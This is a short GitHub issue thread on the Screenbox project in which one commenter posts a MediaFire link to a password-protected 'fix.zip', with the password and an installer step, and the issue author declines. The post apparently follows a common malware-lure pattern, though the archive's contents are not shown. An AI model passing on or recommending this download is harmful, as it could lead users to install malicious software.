### ISSUE TITLE
remove this

### ISSUE THREAD

**Issue by ghareebfiddunya** [huynhsontung/Screenbox#431]

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ghareebfiddunya** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

No, thank you.
